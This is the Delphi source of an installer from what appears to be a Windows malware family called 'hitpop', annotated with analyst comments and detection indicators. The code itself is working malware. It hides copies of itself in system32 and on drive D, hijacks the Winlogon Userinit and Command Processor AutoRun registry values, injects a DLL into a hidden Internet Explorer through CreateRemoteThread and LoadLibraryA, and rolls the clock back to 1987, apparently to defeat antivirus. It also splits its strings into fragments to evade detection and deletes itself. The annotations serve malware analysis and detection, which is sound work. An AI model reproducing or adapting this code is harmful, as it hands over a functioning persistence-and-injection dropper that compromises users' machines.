📄 install.dpr
try
SetFileAttributes(pchar(fn),0);
sleep(100);
p:=pchar(fn);
deletefile(p);
except
end;
end;
{ Copies fn to fn_new when fn_new does not exist yet, then marks the copy
  System + Hidden + ReadOnly.
  Analyst notes:
  - The empty except block discards any exception, and the return values of
    copyfile and SetFileAttributes are not checked, so failures are silent.
  - Files carrying these three attributes are not listed by a default Explorer
    view or a plain dir; use attribute-aware listing (for example dir /a) when
    hunting for the copies this program makes. }
procedure mycopyfile(fn,fn_new:string);
begin
if fileexists(fn_new)=false then
try
// third argument true = fail rather than overwrite an existing target
copyfile(pchar(fn),pchar(fn_new),true);
sleep(1000);
SetFileAttributes(PChar(fn_new), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
except
end;
end;
{ Writes an embedded resource out to fn if fn is missing, then records fn in
  the ini file cfg.
  fn       - target path of the file to create
  dllname  - resource name handed to ExtractRes
  dlltype  - resource type handed to ExtractRes
  dllflag, item - passed to IniFileWritedString ahead of the value fn;
                  presumably section and key (helper not shown - confirm)
  cfg      - ini file name
  NOTE(review): ExtractRes and FuckCode are defined outside this listing.
  ExtractRes presumably saves the named resource to fn; FuckCode is called
  throughout the file with no arguments and its purpose cannot be determined
  from here. }
procedure copydll(fn,dllname,dlltype,dllflag,item,cfg:string);
begin
// the if guards only the try block; the ini write below always runs
if fileexists(fn)=false then
try
FuckCode;
ExtractRes(dllname, dlltype, fn);
except
end;
// recorded even when extraction failed or raised, so the ini entry alone does
// not prove the file exists on disk
IniFileWritedString(dllflag,item,fn,cfg);
end;
{ Sets the machine's local clock to the given date and time components.
  The values are encoded to a TDateTime, converted to TSystemTime and passed
  to setlocaltime; the SetSystemTime variant is commented out.
  Analyst notes:
  - The program body calls this with the year forced to 1987 and later
    restores the year, so a sudden jump of the system clock to 1987 is an
    observable side effect of this installer.
  - Changing the clock needs the system-time privilege and, where the audit
    policy covers it, is logged as Windows Security event 4616. }
procedure SetTime(y,m,d,h,min,se,ms:word);
var rq:tdatetime;
SysTime: TSystemTime;
begin
rq:=EncodeDateTime(y,m,d,h,min,se,ms);
DateTimeToSystemTime(rq,SysTime);
//SetSystemTime(SysTime) ;
setlocaltime(SysTime);
end;
{ Builds the path of Internet Explorer on the drive that holds the system
  directory.
  GetSystemPath (defined outside this listing) is reduced to its drive prefix,
  that is everything up to and including the first colon, and the fixed suffix
  '\program files\internet explorer\iexplore.exe' is appended.
  The program-files folder name is hard-coded rather than queried, so the
  result is only a guess at the real install location. }
function GetIEPath: string;
var
Path: string;
begin
Path := GetSystemPath;
// drop everything after the first ':'
Delete(Path, Pos(':', Path) + 1, Length(Path));
// keep the leading characters through the ':' (redundant after the Delete)
Path := Copy(Path, 0, Pos(':', Path));
Path := Path + '\program files\internet explorer\iexplore.exe';
Result := Path;
end;
{ Returns the null-terminated buffer Str as a Delphi string.
  NOTE(review): the RTL ships a routine with this name in SysUtils; the uses
  clause is not visible in this listing, so whether this shadows it is not
  confirmed. }
function StrPas(const Str: PChar): string;
begin
StrPas := string(Str);
end;
{ Lists the handles of windows whose class name equals ClassName.
  ClassName - window class to look for (callers in this file pass 'IEFrame')
  st        - output; each match is appended as ',[handle]', then the leading
              comma is removed and a trailing comma added, giving
              '[h1],[h2],'. With no match the result is the single
              character ','.
  The walk starts at the active window, or the foreground window if there is
  no active one, and follows GetNextWindow in z-order.
  Analyst notes:
  - GetClassName is called with a length of 10 although the buffer holds 51
    characters, so class names are compared on at most their first 9
    characters.
  - The first loop ends only when wnd is 0, so the second loop (GW_HWNDPREV)
    is not entered as written; windows above the starting window in z-order
    are never examined. }
procedure GetWindowsHandle(ClassName:string;var st:string);
var h,wnd:integer;
ClassName1: array [0..50] of Char; { class name of the current window }
s:string;
begin
st:='';
h := GetActiveWindow(); // original note: change IEFrame to the class name of the Tencent browser
if h=0 then
h:=GetForegroundWindow();
wnd:=h;
// walk downwards in z-order from the starting window
while wnd<>0 do
begin
GetClassName(wnd, @ClassName1, 10);
if StrPas(@ClassName1) = ClassName then
begin
s:=inttostr(wnd);
st:=st+','+'['+s+']';
end;
wnd:=GetNextWindow(wnd,GW_HWNDNEXT);
end;
// wnd is 0 here, see the note in the header
while wnd<>0 do
begin
GetClassName(wnd, @ClassName1, 10);
if StrPas(@ClassName1) = ClassName then
begin
s:=inttostr(wnd);
st:=st+',['+s+']';
end;
wnd:=GetNextWindow(wnd,GW_HWNDPREV);
end;
// strip the leading comma and terminate the list with one
st:=copy(st,2,length(st))+',';
end;
// Inject into a process
{ Makes another process load the DLL at DLLPath by starting a thread in it.
  Process - handle of the target process, opened by the caller
  DLLPath - path of the DLL as a null-terminated string
  Returns True when a thread handle was obtained; the result of the load
  inside the target is not inspected. All exceptions are swallowed by the
  empty except block, in which case the function returns False.

  Sequence visible in the code:
  1. xVirtual_AllocEx reserves 4096 read/write bytes in the target.
  2. WriteProcessMemory copies s1 (4096) bytes starting at DLLPath into it.
  3. xCreate_RemoteThread starts a thread at kernel32's LoadLibraryA with the
     copied buffer as its argument.
  4. The function waits for the thread, frees the remote buffer and closes
     the thread handle.
  xVirtual_AllocEx, xCreate_RemoteThread, xVirtual_FreeEx and FuckCode are
  defined outside this listing; the x-prefixed names presumably wrap the
  Win32 calls of the same name - confirm against their definitions.

  Analyst notes:
  - This is the long-documented remote-thread DLL load pattern. Telemetry that
    exposes it includes Sysmon event 8 (CreateRemoteThread), event 10
    (ProcessAccess) on the target and event 7 (image load) for the DLL.
  - The Thread = 0 check happens only after the wait and the free.
  - thh, Write_Process_Memory, hdll and WriteProcessMemorys are declared but
    only referenced from commented-out code. }
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters:pointer;
thh,m1,p1,s1:cardinal;
Write_Process_Memory:function(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL;
hdll:integer;
WriteProcessMemorys:string;
begin
Result := False;
//hDLL:=LoadLibrary(pchar(kernel32));
//if hdll>0 then
try
try
// allocation flags are placed in variables instead of being passed as constants
m1:=MEM_COMMIT;
p1:=PAGE_READWRITE;
s1:=4096;
FuckCode;
Parameters := xVirtual_AllocEx(Process, nil, s1, m1, p1);
FuckCode;
//showmessage('a');
if Parameters = nil then Exit;
sleep(1);
//WriteProcessMemory:='WriteProcess';
//WriteProcessMemory:=WriteProcessMemory+'Memory';
//hDLL:=
//Write_Process_Memory:=GetProcAddress(hDLL,pchar(WriteProcessMemory));
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), s1, BytesWritten);
FuckCode;
//showmessage('1');
//Create_Thread(nil, 0, @CloseKaoBa, nil, 0, thh);
Thread := xCreate_RemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
FuckCode;
//showmessage('2');
WaitForSingleObject(Thread, INFINITE);
FuckCode;
//showmessage('3');
xVirtual_FreeEx(Process, Parameters, 0, MEM_RELEASE);
//showmessage('b');
if Thread = 0 then Exit;
FuckCode;
CloseHandle(Thread);
Result := True;
except
end;
finally
//if hdll>0 then freelibrary(hdll);
end;
end;
{ Starts or finds an Internet Explorer process and has it load fn_hit_dll
  through InjectLibrary, recording progress in the ini file named by the
  global cfg.
  fn_hit_dll - path of the DLL to load into the browser process

  Flow visible in the code:
  1. Writes run=no and an empty hwnd under [ie] in the ini file.
  2. Calls EnabledDebugPrivilege(true) (helper not shown; presumably enables
     the debug privilege - confirm).
  3. pid is fixed at 0 because every lookup of another process name is
     commented out, so the Internet Explorer branch always runs.
  4. Takes a list of IEFrame windows, launches iexplore.exe hidden (WinExec
     with sw_hide), waits 500 ms, takes the list again and uses the first
     handle that was not in the earlier list to obtain the process id.
  5. If that fails, creates iexplore.exe with CREATE_SUSPENDED and uses the
     process id from ProcInfo. StartInfo is passed without any initialisation
     visible in this procedure.
  6. As a last resort uses the first IEFrame window found.
  7. Opens the process with PROCESS_ALL_ACCESS, calls haskv (not shown),
     waits two seconds, injects, and writes run=ok under [ie] on success.
  Every stage is wrapped in an empty except block, so failures are silent.

  Analyst notes:
  - Host indicators: an iexplore.exe instance with a hidden or never-resumed
    main thread whose parent is not Explorer or another browser process, and a
    non-browser process opening iexplore.exe with full access rights.
  - The [ie] run and hwnd values in the ini file show how far this routine
    got on a given machine. }
procedure start_hitpop(fn_hit_dll:string);
var pid:integer;
Process: DWORD;
IEPath:string;
r:boolean;
StartInfo: TStartupInfo;
ProcInfo: TProcessInformation;
st1,st2,s,t{,kv}:string;
i:integer;
s_tmp:string;
begin
FuckCode;
//r:=false;
try
// copy plugin dll (original comment; the code below only writes ini values)
// the section name 'ie' is assembled from two single characters
s:='i';
s:=s+'e';
IniFileWritedString(s,'run','no',cfg);
IniFileWritedString('ie','hwnd','',cfg);
// inject into process
try
EnabledDebugPrivilege(true);
except
end;
pid:=0;
//pid:=GetHanlde('qq.exe');
//if pid<=0 then pid:=GetHanlde('WangWang.exe');
//if pid<=0 then pid:=GetHanlde('popo.EXE');
//if pid<=0 then pid:=GetHanlde('KPFW32.EXE');
//if pid<=0 then pid:=GetHanlde('KAVStart.EXE');
//pid:=0;
if pid<=0 then
begin
IEPath:=GetIEPath;
try
//showmessage('a');
// window list before and after the hidden launch; the difference identifies the new window
GetWindowsHandle('IEFrame',st1);
winexec(PChar(IEPath),sw_hide);
sleep(500);
GetWindowsHandle('IEFrame',st2);
//showmessage(st1+' '+st2);
t:=st2;
while true do
begin
if st2='' then break;
// take the next '[handle]' token off the front of st2
i:=pos(',',st2);
s:=copy(st2,1,i-1);
st2:=copy(st2,i+1,length(st2));
//showmessage(s+' --- '+t);
if s<>'' then
if pos(s,st1)<=0 then
begin
// strip the surrounding brackets to get the numeric handle
s:=copy(s,2,length(s));
s:=copy(s,1,length(s)-1);
//showmessage(s+' . '+t);
GetWindowThreadProcessId(strtoint(s), @Pid);
if pid>0 then
IniFileWritedString('ie','hwnd',s,cfg);
break;
end;
end;
except
end;
//showmessage('aa:'+inttostr(pid));
if pid<=0 then
begin
try
// fallback: create the browser process suspended and take its id directly
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := ProcInfo.dwProcessId; //GetProcessID('IEXPLORE.EXE');
except
end;
//showmessage('bb:'+inttostr(pid));
end;
end;
//showmessage('3.'+inttostr(pid));
// last resort: use the first IEFrame window that exists
if pid<=0 then
try
GetWindowsHandle('IEFrame',st2);
if st2<>'' then
begin
i:=pos(',',st2);
s:=copy(st2,1,i-1);
s:=copy(s,2,length(s));
s:=copy(s,1,length(s)-1);
GetWindowThreadProcessId(strtoint(s), @Pid);
if pid>0 then
IniFileWritedString('ie','hwnd',s,cfg);
end;
except
end;
if pid>0 then
begin
FuckCode;
//PID:='';
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
//if Process=0 then showmessage('0')
//else showmessage('ok');
if Process>0 then
begin
try
EnabledDebugPrivilege(true);
haskv;
sleep(2000);
except
end;
try
r:=InjectLibrary(Process, Pchar(fn_hit_dll));
if r then
begin
s_tmp:='ie';
IniFileWritedString(s_tmp,'run','ok',cfg);
end;
except
end;
// NOTE(review): no CloseHandle(Process) appears in this procedure
end;
end;
except
//on e:exception do
// showmessage(e.message);
end;
end;
{ Program body of the installer. Summary for analysts; every value below is
  assembled in this block, mostly from short string fragments (presumably so
  the full names do not appear as plain strings in the binary):

  Configuration
    ini file name 'mywinsys.ini' (previous generation: 'winsys.ini'); the
    directory depends on IniFileWritedString, which is not shown.
  Files created (SystemPath comes from GetSystemPath, not shown; ver from
  flag_ver)
    d:\mplay.com                        copy of this executable
    SystemPath + AlxRes<ver>.exe        copy of this executable
    SystemPath + scrsys<ver>.scr        copy of this executable
    SystemPath + winsys32_<ver>.dll     resource 'maindll'
    SystemPath + winsys16_<ver>.dll     resource 'start'
    SystemPath + scrsys16_<ver>.scr     resource 'start'
    Copies are made through mycopyfile, which sets System, Hidden and
    ReadOnly attributes.
  Persistence
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, value
    Userinit, set to 'rundll32.exe <winsys16 dll path> start'. The string
    written here does not contain userinit.exe; responders should compare the
    value with the Windows default and restore it.
    HKLM\SOFTWARE\Microsoft\Command Processor, value AutoRun, set to
    d:\mplay.com through CreateBakRegKeyValue (not shown).
  Security-product interference
    When HasKaba returns true the clock year is set to 1987 for the duration
    of the install and put back in the finally section (never earlier than
    2007). HasKaba, haskv and CloseKaoBa are defined outside this listing;
    their names suggest antivirus detection and window closing, which cannot
    be confirmed from here.
  Clean-up
    Files of the previous version are deleted on upgrade, and the running
    executable is removed through ExtDelMe unless it runs from the system
    path or as d:\mplay.com.
  Command line
    '-sj' as first parameter sets sj, which skips the old-version clean-up
    and the browser injection.
  flag_end, flag_ver, flag_id, cfg and BatchFileName are globals declared
  outside this listing. }
var DllAllpath:string;
SystemPath,filename:string;
thh:cardinal;
oldcfg:string;
ver:string;
oldver,pif,autorun:string;
fn_exe,fn_dll16,fn_dll32,fn_bak_exe,fn_bak_dll16,s_hitpop:string;
y,m,d,h,min,se,ms,y_tmp:word;
sj,kb:boolean;
s1,tmp:string;
fn_dll_hit:string;
id:string;
begin
flag_end:=false;
try
try
sj:=false;
if paramcount>0 then
begin
//showmessage('a:'+paramstr(1));
if paramstr(1)='-sj' then
begin
sj:=true;
//showmessage('b:');
end;
end;
ver:=trim(flag_ver);
id:=trim(flag_id);
// cfg becomes 'mywinsys.ini'
cfg:='myw';
cfg:=cfg+'in';
cfg:=cfg+'sy';
cfg:=cfg+'s.i';
cfg:=cfg+'ni';
SystemPath:=GetSystemPath;
filename:=lowercase(paramstr(0));
// fn_exe becomes 'AlxRes'
fn_exe:='Alx';
fn_exe:=fn_exe+'R';
fn_exe:=fn_exe+'es';
// fn_dll16 becomes 'winsys16_'
fn_dll16:='win';
fn_dll16:=fn_dll16+'sy';
fn_dll16:=fn_dll16+'s16_';
// fn_dll32 becomes 'winsys32_'
fn_dll32:='wins';
fn_dll32:=fn_dll32+'ys32_';
fn_bak_exe:='scrsys';
// fn_bak_dll16 becomes 'scrsys16_'
fn_bak_dll16:='scrs';
fn_bak_dll16:=fn_bak_dll16+'ys16_';
pif:=lowercase('d:\mplay.com');
// s_hitpop becomes 'hitpop'
s_hitpop:='hi';
s_hitpop:=s_hitpop+'tpop';
//autorun:='d:\autorun.inf';
// handle the old version: carry two settings over from 'winsys.ini'
oldcfg:='winsy';
oldcfg:=oldcfg+'s.ini';
s1:=IniFileReadString(s_hitpop,'test','0',oldcfg);
if s1='1' then
begin
IniFileWritedString(s_hitpop,'test',s1,cfg);
end;
s1:=IniFileReadString('sys','usertype','',oldcfg);
if s1='main' then
begin
IniFileWritedString('sys','usertype',s1,cfg);
end;
// when started as d:\mplay.com: stop if a newer version is recorded, or if
// this version's exe and dll are already present
if lowercase(pif)=filename then
begin
oldver:=IniFileReadString(s_hitpop,'ver','0',cfg);
if strtoint(ver)<strtoint(oldver) then
exit;
DllAllpath:=SystemPath+fn_exe+ver+'.exe';
if fileexists(DllAllpath) then
begin
DllAllpath:=SystemPath+fn_dll16+ver+'.dll';
if fileexists(DllAllpath) then
exit;
end
end;
EnabledDebugPrivilege(true);
kb:=HasKaba;
// clock is moved to 1987 and the program waits 14 seconds; y_tmp keeps the real year
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y_tmp:=y;
y:=1987;
SetTime(y,m,d,h,min,se,ms);
sleep(14*1000);
except
end;
haskv;
CreateThread(nil, 0, @CloseKaoBa, nil, 0, thh);
// create an autostart entry on drive d (original comment; the code is disabled)
{if lowercase(id)='test' then
try
SetFileAttributes(PChar(autorun), 0);
sleep(500);
IniFileWritedString('autorun','open',pif,autorun);
sleep(500);
SetFileAttributes(PChar(autorun), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
except
end;}
// delete the previous version
oldver:=IniFileReadString(s_hitpop,'ver','0',cfg);
if strtoint(ver)>strtoint(oldver) then
if sj=false then
begin
FuckCode;
IniFileWritedString(s_hitpop,'ver',ver,cfg);
DllAllpath:=SystemPath+fn_exe+oldver+'.exe';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_bak_exe+oldver+'.scr';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_dll32+oldver+'.dll';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_dll16+oldver+'.dll';
mydeletefile(DllAllpath);
DllAllpath:=SystemPath+fn_bak_dll16+oldver+'.scr';
mydeletefile(DllAllpath);
mydeletefile(pif);
end;
FuckCode;
// copy self to d:\
mycopyfile(FileName,pif);
IniFileWritedString('exe','fn_pif',pif,cfg);
// copy self to system32
DllAllpath:=SystemPath+fn_exe+ver+'.exe';
mycopyfile(FileName,DllAllpath);
IniFileWritedString('exe','fn',DllAllpath,cfg);
DllAllpath:=SystemPath+fn_bak_exe+ver+'.scr';
mycopyfile(FileName,DllAllpath);
IniFileWritedString('exe_bak','fn',DllAllpath,cfg);
// copy plugin dll; tmp becomes 'dll_hitpop'
DllAllpath:=SystemPath+fn_dll32+ver+'.dll';
tmp:='dll_';
tmp:=tmp+'hi';
tmp:=tmp+'t';
tmp:=tmp+'pop';
copydll(DllAllpath,'maindll', 'dll',tmp,'fn',cfg);
fn_dll_hit:=DllAllpath;
// copy startup dll to system32
DllAllpath:=SystemPath+fn_bak_dll16+ver+'.scr';
copydll(DllAllpath,'start', 'dll','dll_start_bak','fn',cfg);
DllAllpath:=SystemPath+fn_dll16+ver+'.dll';
copydll(DllAllpath,'start', 'dll','dll_start','fn',cfg);
// write the autostart registry value
//HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
//sleep(100);
if FileExists(DllAllpath) then
begin
FuckCode;
CreateRegKeyValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit','rundll32.exe '+DllAllpath+' start');
IniFileWritedString(s_hitpop,'kv','0',cfg);
end;
// inject into process: skipped when running as d:\mplay.com or with -sj
if FileExists(fn_dll_hit) then
if lowercase(pif)<>FileName then
if sj=false then
start_hitpop(fn_dll_hit);
if fileexists(pif) then
CreateBakRegKeyValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Command Processor','AutoRun',pif);
except
end;
finally
sleep(1000*3);
flag_end:=true;
//sleep(1000*20);
//showmessage(SystemPath+#13+FileName);
//halt;
// put the year back; anything below 2007 is replaced by 2007
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y:=y_tmp;
if y<2007 then y:=2007;
SetTime(y,m,d,h,min,se,ms);
except
end;
//RunKv;
IniFileWritedString('sys','bat',BatchFileName,cfg);
// self-removal, only when not running from the system path or as d:\mplay.com
if pos(lowercase(SystemPath),lowercase(FileName))<=0 then
if lowercase(pif)<>lowercase(FileName) then
if pos('system32',FileName)<=0 then
ExtDelMe(FileName);
end;
FuckCode;
exit;
end.